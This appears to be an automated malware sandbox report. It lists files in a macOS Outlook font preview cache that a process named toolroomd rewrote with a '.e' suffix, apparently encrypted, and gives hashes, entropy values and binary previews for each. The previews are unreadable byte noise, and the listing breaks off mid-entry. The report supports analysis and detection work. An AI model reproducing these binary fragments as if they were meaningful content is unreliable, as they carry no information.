Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a^'..0..i.S...X.....L;.....z.W....<!.m.Q;.n\.Yb,...,Nt]V.m ...;V#... ."<jx.k.uc\|...$.{..\.U3........Wa...vP......L.X+g..!.$.......'\|m<?...)........r...w._;.,.8\.0...e....$....?G.k....l./.z....d..P..5./.,yvE...E..U_...z.q{.^.Du......D../g....^...m...cb.0...3...G.- ..P..O.x9A?..N./S....B.q..N....h#..$.w..X.....s......i.m....:x..N...7_.yW#.h...S 9.2...o..iK.0..x.../...b+7.7.E.....y...~..)......+[ELz........./.n.h.\|c......y*......:...@.p&O_.ew...!K....(..6.v....67.4..s?...._r/B...$..kMO....4.S.V.z.c8..H...0.....}'o<..T.p.N.z.....T......Y..fD.k^..x...Y.. ...L.3Q...z9...p....;....JTYw{.uW`.......-}.mN....q....ml83...;.@...V........?....+.)...P...@CQvMO..&D...'..B......s..-....C.....9;.....)y)...$....p+ul8}.....;l..AK.2{.Xjs.......'..c.$..Q.+.J....L.4...9.{g....;..U6Y....t$.T....W^...Y.3...l.mV..6..........2..]........I...Y..p.v.).........$..c...1&...Ev.Ou.)..&.h....R.."........=..W7.aR\|.OZ..n.......w.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	7.571638866683624
Encrypted:	false
SSDEEP:	48:3V9RRjRHnepNg9TwsAuGRhL/ApVIVW49KkZ8lcXNpq:3V9RRRHep+ws30hTAJs8mu
MD5:	477BF067AD9905CA83EEAC66A3964A04
SHA1:	4DF9AB1C5E21F2FD27806BFFECB024CC7FFF0C45
SHA-256:	2ED10321E4F7DDE879B8ACF085E64385A72B3FC339319A2938452423F7F6E712
SHA-512:	B76D4D3880E3D44C2CB789F18BA0A67E6012838435C64678AF6E7C46A9A9AF25FAB4C53DE531CE94A5AE6109936859A03434F4B106F3285AD201D336216C9F20
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a..a+..I..kz.&.%..z.+.?y.i..,....B..@.k...."...W.4...1..b.r......Ws.3..>#>z......\|..K......xR2-&..O........5.......qP.#..........i.6\|.8.Q'\|aU..%.7=........r......)....\......C.u=C....5+.76.(.s.h....pGN.w..}Z.X^....J&XNL...3]S.<6..~s....../M..:L.Nw.:....2............4K....K............o..~...L..KH}p...!...H4../.].%%.`U.7.yr...T..JJ-B.."..."....V.R3U......XE.tCh.=......*..m9......^.9I.....<.....O......].)...1...je....A:7. ....b.>7G....h...D./@.............y.8O...r.^.%.z}..BvU.Mbp:.....l;2...]...E.I/..c...D.TN...S.m....\..[....4.N...,B..R.[X._.aL...1\...k..`x......$..n.vP.....ce.G.5'.n.?.u&7.W.]..w.Z...(.....;.Q.....KF...'6.....c.....^B..RA.....g.E'...G..H0...e..K..!....>.S0.k.W....Fl7..s.o7...q......AT..e.G+M.rk.M ....R..........I....].W2!.}mx..4a.c..>...iU-.c8.oG..OI.e$<..i.rI..4.w...x.5...a....^4..]..z...abl......}~.Z.`.)....O..n.;...b.....V=....V...6.rsK3.....=...<S&O-..A..3...#.]6...<...m

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Devanagari Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2002
Entropy (8bit):	7.67348856683538
Encrypted:	false
SSDEEP:	48:ETK24Q9kRBqf009+akjXYaUI3PewK1TNpq:KV9d009FQYaUqpK1Tu
MD5:	772470318C7AA4D3F4CD49752E546445
SHA1:	BB775586A9005D0C7BB8C86EA7E29532B551F43D
SHA-256:	65934CD2105BF38CBD40660B5813F37CEE354AB9F78FE4E32EFD7CBD0758CF85
SHA-512:	C90F6A29C6DE54E089FC64CAEB86CE18813CFC57295808C3EE3E00957692AA70A464556227288D3302C9B9F84B1C2BF29C8C498518D37783EC7FD30B2701EE0B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a8l\|.5....@...".Y-V....\|........4A...&....5^...}.)..U...uv.J$...x1-!..U.N8.M...._..u1N...`d......;..1[.!_... .Cp._....Cp._....Cp._..."..4.U....A;..l.....=..D.h.......m....j....._.8k...:2.}....Y.E..#%_......j.~li.Z.K....1V.\|W.....7w...%BX.=.c.X....'.=\|..Ga9.MN..w~....hw.J:.....9..G..R.Y.Y]l....C.9.D.L......\|8C.YD..C>.6.?..'...x,..6E..oL.Csc....%H..0.gZ..i. U.v.*.S.<..$....}\.X,?s.x........^...F/.....U.CW...i........;........eK/....../..#=....VN....d..H)A.@..@.Xi._D........Al....T......w..4!'.T.._....`...r..!.).J..P...6..F.......z.-%5..7.I....Y..W.p....w.fY4........(.y..x.>.P)...F8.=.`..%Fa..!E;O....~V..x..f.c.`..(.)......)A..........".s.Z....b&.r\|....oq..z..ff%.B..oZ..)[........nG.Ss...,..R......$.Y.r.]E'.P`.0..S..FQ.mL<.Q.sG.....>=.u..@.@......O.4.I[!...avZ`....i...^....R....<..wN...Ew....7...3;.....p.....\|%.%\......^....F..g.K.2..v%0...N....#..}oA7\.......eQ...t>.o......@.9.....j=...y.p..gy"

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DidotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1002
Entropy (8bit):	7.152705021435072
Encrypted:	false
SSDEEP:	24:EZNEddCECbJP71ubabcAqCxriKsePc0m7:E/Lv7bRFJiKNpq
MD5:	C63EAB684459F4F98F5A47B4BA106ECD
SHA1:	88F0B7D63077AB2ECBE7AB62006F224F711A075A
SHA-256:	875731F6EC24D31457F2E450B880E86F7273020AC242565346269C1299C22AAB
SHA-512:	60ACA39D341243CD9220426CD4F7C01D591A8FBF8D49CCD2CA1998BB42B9DB773697F8E2A03D4A6F00F085D1ECEE20BB9619F900A14AEEFD8F9DEE80B978B32D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.............{..v......7.(.in.2W0...R..c.F.E..n.6.P\|c..h..J~.).pH_!..^....&..XA.v3m......"'.9..g.).K.J.;7...k......X...Inl>b.U..(=..j....:v..]..=.&..%....Jy$....s...xr...h..;.\K.7..U..H..WK.;..N..C~.=z.z(....D.4.~....ga{.....].G'..@..5...;an..,Y.`.;(..r.d^..mw...H..7.:v%..NJ.....QQ]c..E'..A..?P...g~........)...b.HT.....zu.C....V..w.<...^.A&`TN.t...N..u...Pwk.[.B.3b..,\.}.......T..[.....h..He..O.ikJ:O......j#(.......R_....y.Y...,(..x=.#.{O....;.W\.+.F&.d...FK....s..r....)>...^:..u....5..w.+.\)DW..n[eYRU.k..p.HRf.....H....B........c[..Y.'.4..9[.i.@..$H..b...,..s"s..}m........U..G ..$..{..n......U..u.P..3..9...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Diwan KufiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1442
Entropy (8bit):	7.4758814682318615
Encrypted:	false
SSDEEP:	24:HDj7ISjziiAE48BlWgwMQ60jluAe7NKmsxgiO6l1EGkWsePc0m7:X7IgWa340A+D5iOQyGkWNpq
MD5:	2AAAE2CCF7817B348DECF2F811E07513
SHA1:	D0D455973A39A98B30E753D03C59B5D1D6EF0C54
SHA-256:	55D7835D80D06BCCD60A2500C381B713DC1FA4D2021E258EE1C7B9DFC68A0A02
SHA-512:	B85D315A1A043A8B5DD3AD3B76B0B1A87CBFCA9B01698E860028579ECF248D1B3B552187AB9E75F8C729E7649E5985232040FE66380179DD292A60E4D7259DD4
Malicious:	false
Preview:	.<.\|.....f.A..9.7.,b]....R?..i......0.i .Y.a[9.6...).J7...._KJ.'].4../....a@.@....$..Y\|.[{=7...S.h...6...q#..i\...a..>.>f{.'....!....p..\r. ]..R..4..$...."..;..Y'za.(V.u;..(...{.XBzt..K}.&.^r..0.%....S.....;M...0........0/DP....5g.EG..?C^.F9..:...]....5..M...<_7...@....Y..I.>-......]......pd...i......k...<.....;..SUV.U.......A.".6.>.g.W......d'f8.4R....q.../....h ..5 F....$Y..?."..p...o..r.......[..8..g ....T.C....h....yA..?..H...\|V..?.....2\|...o.:....h... ....~...U.C.<..6..X..qm...sm..G.k-..iN.....^.. .4...@.e..VsB{`bs.R..y'..7..Xm....8..EI.~~$E..GVS8...n......B..?\-{.;.......s......5..NA.M................Gzq.........Hh...... .Q#.....U.l...Gs.BNY..T.El6..4...5.Z...R.Xp...x5.......o....n#q.>.......x._.(.)..G..KL.L...q9.Ub[....H..?.N....s}...y.... ...d.Gu.D.....f......"......_KY.JF.q.4S%a./...W6...2.M...P2.....-_../.5`}8...EI...r]..{.3.xg7.v.."T..N.j....K5.........=i.Uo..,e....I\|xc..Cm...[4.M.......c(..4*.y....R......]...O.)A:...?F..B

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Diwan ThuluthRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	7.530065176490487
Encrypted:	false
SSDEEP:	24:bmYC8r0JtUURJ5u702LdnCy5xM6oO57ri/wvDHHoN3BfWQWsePc0m7:bmY3r0vUURJ5uImN0wPi/wvrwfWbNpq
MD5:	9137191B66CE94AEE1558BB66086B8A6
SHA1:	B4BA818FCDF2A42DF8B15E4C99167C91F810F7EB
SHA-256:	1A9CAD2FEDEA943D6FFA86C48F190938C4A082A34238F8FF9B8500E467E704C5
SHA-512:	4FD1B04CB322210D97E707C78A9DF5B65309A1C77DE5AD45EEEAE26EB0DBA960CCCCF9D03E4803B54FFECE3298138808CC7EBC6BDF584CFE7D85171C38B52A55
Malicious:	false
Preview:	.<.\|.....f.A.........?..c..F.u....'.i .Y.af...r.{..S?{..A+...!.(...J..x.i...C~N.^;.D..#_/K.G..`.(.O....;c..~.{\|.....hd..e.Hl..J........D..l.pv.H.ZH..{h.?>........L.X+g..!.$.......'...;...].y ..7.T..W.[..Bo..#....M.....g"e......Fd=..?..qc.N..49.B.).3}.l..:...-..LB%..W.r.S.sH.>..x!W..TM!..y ..-]..$.U..bb }.E.....2(...k.8.Y.[......3..-D!.n)\|v*...6.-0..6..q...%.......WZ{.q.P....c..c.w-...{w...c.Gs..J....Yze............z.g..@1.........R0...?.W..&..l.............EN..%.z...w..nM.&b...l..c...NM..U.{.....-.Y.a.....$..zZ+.I..}..Q...8.N}G.m[.W.Dn.I.'..x.1..U...9f.8.`:..&.y.D A..V.Y.Z@t....{.K.ffP..X.....lN.$(dX.Q......E2..{..3...+p\|nd.Sv.h)......G...R....#..jP...............T.#{Zr...._Dp.Xw?e.hP......m.....Cn...X.&S_P..vP..g]..U.(.N.3C..B...D@.k.oa*d.....i.p... .g..E`.....H.......).r.J...:5\|.E.....dK.&".t.....}!q.%....9C..78.e0..`.^i?.^.U.0+'...4=.R).-^$P.n..D.([....h.s/.'...I..L.....#.e.-....o.R.......eA9y...xJC..-...b}M!.GY3.x/.k...D.F.a..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.DubaiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.213180798833248
Encrypted:	false
SSDEEP:	12:W6AAALbNQC3YfuQvmxOY0lhpmjU+OqVbT2bL/4OO7Sta7HVi7A5YsewLYTc+qGm7:+LiXv8KlnmjUKVorVOS8HVNisePc0m7
MD5:	2309D2963FB16213D970600538290796
SHA1:	EAA1A97C3DEFA4BB3C478879F7A8516373219CB3
SHA-256:	6755B910BFEC6EA55C8C7A42776822F15C3D5752DF71709ADA056C20792BA8EC
SHA-512:	CFF181EFDBD634B2F59F87F35039D5950446D93236671D29D3D206E05D903BC80107EF7DF66D7EB2F981116C49678E6F4AADFC095070E176E1D73EBB17937B63
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.aY..~A%Fm.B`...!. .!.... ....O.4.. .....m../[....P..N.1...dg).y.H..N.g...u.B.hG...$d9.?..}&.^..dS,..I..\|.+g.?%o.?LY..IW11PHxgxA...}.K........N#...:..7..s..~..=.....;H.D.F.w.].....R.\D..W..(.6?.?.~.......5"..Of.....ny...u.....s..(.R6.....\.y..s.....@..DkDO....a4... .i.....z[6...x..@m&a...a~....R...YnF.tO..RB.&cD.-..1....l.!.....s.H.....`.......oE.\.x.f......-.E0..LpT..qL=N..w..wuv....1.._..pV.......3.x5L.38..U..:d.<.....YU=Q.".....G..@.u..u.f.c.8.....@5Z......I.+..ot.rl..".B .U.n.%..G.Tn.r.}D4.K.r.y:..b.....w.:s..`.V.....y...J..C.qK2..)^m.D.eT........?.....+^.....7F.r...Ft...?pzlL...._...T..}...Y.y]........x.........=.z.S.....S...?%o.?LY..IW11PI..\|.+g.h+@..6......D28...S..._.Kw.+..g...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Euphemia UCASRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1594
Entropy (8bit):	7.546169008452448
Encrypted:	false
SSDEEP:	24:EqK57uPIIrVD2r1GKAszO6hXqFh/AyynKbYx2F0iUIXfe0f3OrqyvmjVsePc0m7:E70PnRD2pGSzZh2hy4+t6XBfEdv8Npq
MD5:	852918A132CF494DCF44871F857B4D06
SHA1:	C97A5259245F45C08D24525160319D6D438E0366
SHA-256:	6FA67A17FB15E85838575FFF1B586EB0C58001AB4916A45E3E50D06DFB3DE455
SHA-512:	966B57B4C7DB1818B556DEAF48725C3D6510F2BD40DCCC0F378E0099116EBCF73E495DF4AB9ABCDA5D5A8DA59ED5CD8FBA7EF302CE78F337F36ED570132B2000
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a$4b..5.'..jP...ZS5Lf.....m....7.....x0..b....e...m.g..o]..C..Z..+ ..,...;.Ax6".K..F7...7.5f.....8..&..2c.N..M.....r...S.....v..8iO....rw].hD1.O........[.~.....U....S.).......Xg.(.....(.T......xdl.q..A.8.U...~yY.>>?....... W.w...8.......p.\|..f.:..f.....4.....YH .....,..............j....,.....Z.,.Q[.....(~4..3..D....BAD.7(..uh"..4....%..!h.Q.h..~X....L...@....?.FKZ.V.F.<M...B2\|.2........<N.._...<...C.W..)..U..{.......g..cK4G. .......].7....Sg...........<..4.Gw.....[....../.b..f..y....-.z....W.-...,[`..._s.M...#..Ra.[..w8..'.....M.........%...b....pg.k......A..Q....w'..(.GI.....d.x.v".d...e..W.h..,........j.N.T@.$...a.x.4Nv..3#....q.._D,..p{6..Au.v..!-j.5.....A.s.......<.E..J)}b....s...}............1...3.D5...+.Y.Y..f.&.b..UG...E~.r..,.?...O.'...\|W^...Y.;Vl,....I.c.zZ.......Y..R.}..F..B/.Q..n.(..tZ..^.w...)...=g.GQ..R..&..{..4....=Q!.e.....O....G....?..c).f..?-.N.h.d/.t...\._f...).

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FarahRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	898
Entropy (8bit):	7.018572499834332
Encrypted:	false
SSDEEP:	12:WvyOvVzv2rTa39o26QSfpi1nA6PYq9kgj0j6iQCCwPfUz+ysewLYTc+qGm7:EvRvIgXSw1nACYYvOf9CwUzRsePc0m7
MD5:	4DFC1D66FF7BCD1B6336496D536C4905
SHA1:	7365E598C63356D58DAFC153C2BA488B02A3D757
SHA-256:	43FDEC35AEC4FFE297B7A72CBF6DB4B59040B0D942DBB93755ACF84E0AF63F7B
SHA-512:	3277C90F3198488D1CEDEFE38658A6B5DC7B4FAFD8F84AC1201A1CC6690837624D0C94F2F21F976ABBED2F475099D44AC7D0BEC6C8189B4642AF500447B51AEF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...v=q.V.M...t.)...:....p........ .lu1...;k.>W.z...'&..f...B/Q.....8.LM.N..d...lu..`..Q....Z../..if1...><.K............\|z.8..k..N.............S...<. H@`...Y..[(.u........_.0.kCn.:.....^<....po.....B..V\|.H.kw;..f`b.Y....1.........h]...4X../Y...Q.'.}4.......2lyA7\|...v.......".R.HT..?.T-z...d....>.^..BO..^oL.LcP..G=...j.3-...Ih.0....g}..d............Xa..."..6N........5..:5M.L..\z.....[\|.cW....N..!@......Y..-6....N4.&..0'..l.T...hnw.$...X.k...qj..G..!.....Q..5.......[..l.".E.....N.....6....}:6......=..w\|...S..._wY.,.I...Q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FarisiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.201559271012238
Encrypted:	false
SSDEEP:	24:PfjMvcJ1v7FF2986V0BpnqfJgOGU/YXDKHR5BsePc0m7:PYgvZKp6nqfumcKDBNpq
MD5:	71F93E2BD524BC41B8BBEFA650E5A9C3
SHA1:	75F3A29EB979C2F23CF2D62FFF248FBFE12A40E1
SHA-256:	3E4DFC83F6ABCECF682E66F0511B33B77C65C15118950EDD4E74C4F23A674912
SHA-512:	A0B0A392452DB27E13EC5DB4E0608BA83444A741A6C740B451829B01E4278C35F3253E41ADB982FC4A213725A5641E691A678FE36601BEEE10987BE6238FAAE1
Malicious:	false
Preview:	.<.\|.....f.A...=...{.E.`..;M...{U..Dw.i .Y.a...@...I.%H_....w0;CS.%H...i i.b...t/.(`7.2<......Md...u.F..v..]5T...#U.......1MX.;@.c.+......6.`MI.AP1.K.3.0.'..`~.2t....S.o\|..m..m'......,.........d..A........(..T.....R.Q-..v..rm..L.?q.:~......4.U..../....fzc".....2........{i..n..K.@..!.'.......;.#..R......?.I@d.I...A._.y..`Q.P.....R..;.n..\...M'kY;g.).0./..n..%.2..n...M..EITT..vY...L.[.Z.Rg.a=.......\|.\..e.v..&E.Wx.a.n.A..............h.L.t1..J......LyP.......F..^.G6}obE?..5.".#..q/..>.x..~....j8P!.?.+K.V..'.C.<.o..L..!2....W.{.0)..U..&..k.6.F.......")TU.....V7.5T.Z..`.5GB....m....h.1e.1N..O...l..!..]..(.C.Q.g..............t...&l.l.....n.=..2.....dq#.C...5......6.....'e......_.!bt&....J.m.......................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FontPreviewCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	466
Entropy (8bit):	5.721229341809323
Encrypted:	false
SSDEEP:	6:UqsLHINJvavZOmdIuq9RTB6SQbveiHmECBzsewLYHEec/LaqG8rQQwiQ/6:Ux6CvZhit6SZ7E+sewLYTc+qGm7
MD5:	F87EF79A5B3A01E946D65F6B1364FFB4
SHA1:	5F8EC6A338589D3850924AD15B374E223D675E87
SHA-256:	72BC4A6E35860B3894F48FBC2F0D01A23044FBA5C2000D6C3901B15D60CEDC2C
SHA-512:	F3548F0CB0AEA32B58953A95DF96D9B784227A66ABD6D03A0CF068820741700F0FD4F7329144C3FE00C73DD94E82B53E9F1584F482CFCBBC7F5F25095B9C207D
Malicious:	false
Preview:	...a>k....'V\..sv.0........B....A-v7]V..0.....Y@{...\|kJ.R.~.K......m.JT]%..US+nB....W..x/...$...P.a.S@Du7.#.I...t..F.t<n....s.$:....1@6<.."a..$g........................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.FuturaMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	946
Entropy (8bit):	7.095436274474022
Encrypted:	false
SSDEEP:	12:WvyOumfundXYoHegFRNkhlhn2/UQZkP1SeJV0LXYEPNIaXCxynprnultGsewLYTw:EuRIoHkiUQuEmWLX5P2dxMuWsePc0m7
MD5:	B12207F2E7612F3B0F9660F1DD43394D
SHA1:	B5AD0B320C30AD9F642EF226E6E67BB993907EE6
SHA-256:	860BACA97D1AA7F5F9340522324ED268F317277E0EFD705EBAAC1F7DFD92304E
SHA-512:	D11F62B751181592B71003E6ED1DE363D1AC1B3533A877FABFEC9C201458569411D4D6F4DEC0A754827926D6CB04012C08EFD372E4C000C7FF6AFF601B396D91
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..?C...?.m..&....0.BR....=.0._...Z.....}b...G.E....... a.7..[../...s..E...]J5dtS....M:Mn...j.v.?%o.?LY..IW11PVv.u.!..BC...n.w...u.!.....Y..../.g...8"./...G1..1.pG.^..s....#(r$.e...i.Y0t...........S>..K.SBI..!.j...?........S.z?E...Y.Y/f..7.@....G.C....EI6..W..2......;.^y...M.!.q:..m....;z.XZ._b..&_.Q)..gY~q.Q........d....3.g."....?....Xb.te..EO_..YY.dy......_.8.?..si.^X....5.:...7.M..:"..._. ..Sj.1fs..d..-u\,R.HC.<.L..~..b;-.%.a.....n..i7...../'.._.7H\.....e....q......Op{.........(......d>...]...Q#.3..8OU.n....K5....Yr_..IW11P.......;...Kt.,0.$j=%.....q.K....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GautamiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1290
Entropy (8bit):	7.399253945357625
Encrypted:	false
SSDEEP:	24:btHB6/sNnUkVN1N/ojdvUnngi6OiTKNFpM25hCqsePc0m7:bth6UV//oNUoZubpMchCqNpq
MD5:	F295BF4CA28DAC17C751E48E98C86144
SHA1:	64152C5500743A925ED525F0D9D1DFC0A99714C3
SHA-256:	29F51A57BFAFCA7F79B75B1754582E3CC566C5084C38875BA3E6BFEBA6105BDE
SHA-512:	762360E2CCD6B96CA414299000CBBA3F05BF09E6C583D73101286267DCBDF13598B85CF649305252A7152EEA01E27CEE289E81E4B5D16C664CC741429380D948
Malicious:	false
Preview:	.<.\|.....f.A.........?..c..F.u....'.i .Y.a...].......u.D.{.d[.....]...].14...5..L..=...y.S.s..dY...w/.....+8R...._%./.CD..9w.y..CcI.....).Y'za.(V.u;..(...{.XBzt..K}.&.^r..........W....$.i..V..K.........Mm...J!/L.......R..z...W..Q..q..\.#.....z....-Dc<....W...%Od\|...SR....t.\|....OL...$.....mR.y[.\|.OL......c.."...^...I.. h..Z..+0n..PP.W.......U.x.}.6....2n..o.#e.XB.r.\.......wnoa..e....P...[......EP..7.e...M.:c....C9.Y3..V.q...4.K....,?)...E...Up.l.......wo.._&!._.FWW.P.o6........6.<.W..4...c.P....!.......uD.k..4....M+...]..XJv$......sK.eA..."v.....h.OK...\|9.......8lW.......T@.d...L...?+wt.A.d...E....N...8....' a.AZ......jYUiz~r\@.K.l....:.S..0b......-.Ub..7Q]..I.+..~.J.F......-....s.8.4...:.......FP.#....;$.../h...1B.7....lW....8..J.../.l-..nF.Q.EOI...xq9.b\.P..#..;.4.H./............L..K....(&.(.Q.4.m....../.8...+h..*...[...C'.9[.....\.!;..X.!.A.y...@..i.#Y'za.(V.u;..(...{.XBzt...s...c>..nicidK...JCp" ..}..................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Geeza ProRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.484894017137057
Encrypted:	false
SSDEEP:	24:Eua+A4lcX2W+NuMOywwJwU9kmn/5wt1MR1N2iGVhb7sePc0m7:Eu1A8cX2WPMa2kmnWe1kjVhXNpq
MD5:	B1C8405D5E8FAD9205C45DD972FAD4D5
SHA1:	D53BC10DE2D84BF4153D8D531CC9AA43730EE1A1
SHA-256:	28C1DFE169BFE58460603C70B2346F510FBC2AE9E4CE85A018F7C4F8B964C93C
SHA-512:	03E65593146729B52433423059CC54E30EB0E3F2FE1757DDE7A8CE07527900D491F612BC7455DB12753B424A74055265DA9C15CC1A71304014EC691EB4F81431
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aj.5e\..h.8.d).)+._..@?......N.....?.B.xQpci..].. X.....fj7.<....5F~_f.=.@......Ul.s..../..7s.Y.J.....5.#...R'R...X...Px.L..}.b.-5....3.3...g....0.....#3".@E.....=.1 .B..U....".2......~.....~]..b.V@.p......^9.#Z.6.aT.{.K@..M}>(..a.=..\V..I.....5.ym.H...=..+..'g......Cg.xHM.44.R'v.=e.#...-...@..M".>.a..2.`.P.Gb'..E....p(.H.y.O\#\|Uq..@9%P....oO.........%./....(.z:vC_...A=T..t..\|~....[...<..L247........".tN..[...fi}...K..&.a..I..du8E^M.......h..Yr..U.2N.E..d..\i.......Qd.b..E..uw.}......I.......2..=(\|.JShI2.....@...Y...E...H..B..%:._}...h.=vT.........../H.[.X....#Q....=..P...3..>]..(...[.8..,.c.SC..@1..0..M6&J..P....-\|4F.N..z.=....x.....N../.....nx.........N.(j9.v....GM.. .w.I)W.K....2................#DBl.....s..pa....j...a.i...N,7......j...p`...V.../...8.@f...`9&.......1..:X..J.....+..l....p4=.G..&.F....}.1...~.i`7......NP..\|.......%C.m"^..`bs-.m..E..CB*8..O.....ZV/R.5....s@..\...^.x-.rn

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GenevaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	7.387601889396682
Encrypted:	false
SSDEEP:	24:EmIk9nXZJNcLwixTsbL5wBRptyWm5ee00zbMtrk5WsePc0m7:EinTNcnlsvIPtyWm5ee9bMtrxNpq
MD5:	ACB4ADB366AA3F68BECC72A67FBBCF8C
SHA1:	29208048E410AC6914A3CEB4C662C6FCF60FBA5D
SHA-256:	94147812DC3A24B03922A5B23F3F0F9EFD6324C8285C8B01690D457CA88B44C5
SHA-512:	F9FAF3F0836DFEEF159C37A9600CEC84A99E2752F7D1FAF55C682E0182514D1A974DCC70FFC7C11AD90C19CDDBC21E5F400ECE304A0D859F544554B866D58172
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aEr-.q>.:.e....\.ULp.'H........z.i`.\|q./.V$&]q"............wB@~..8...y. ........;.K0.t.D...E^Z...).n^...w...H...n.keA.j.S.S...H..hO..z_.\|.Fk._..cS]R.@\?.....rQ..w.+....$...(G..{...L.-K@..xp........=l)..."....t..q.)...l...../L!.n...(..#=...\x..._b.z....\|....6S....5a..J.x.....C..~.-.2v.n1..ivv.v)#\....-pt...\|n....\....O.t.u........$AW..........Fg\....#^......\....\|w.cF.0.?..2O...Q..b5.u.h(G..mZ.....pZ..^.V...fI.W%..-.l.J.)b7M.H.....i........m.W....O.\|..zf../4.!....XT..7...=......t....5..3U......6.%...GI...N.vr.sC..(....Ew...qO....fW....a...F%.k3%H`...;J..(2.Q..Wi{.5.iO..8.QR.l.>.q...k.%.Y..w.x.d.o./.#mG...}x..u...=0..u'Y...^$9j`.v.0z.a...&....G..L...G.l0...lD}.N...\5.]..4t..V.y.`+..]..G..X.i..h.....y.......cX.t........[j.....}..c..NM.nu.T..2,....w.$iE.r'}.-.W..@`..2.},-....1B......J..j/.K}.&.^r..0.%.......W..u.p.h9....S..._......l....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.GeorgiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.423905362478302
Encrypted:	false
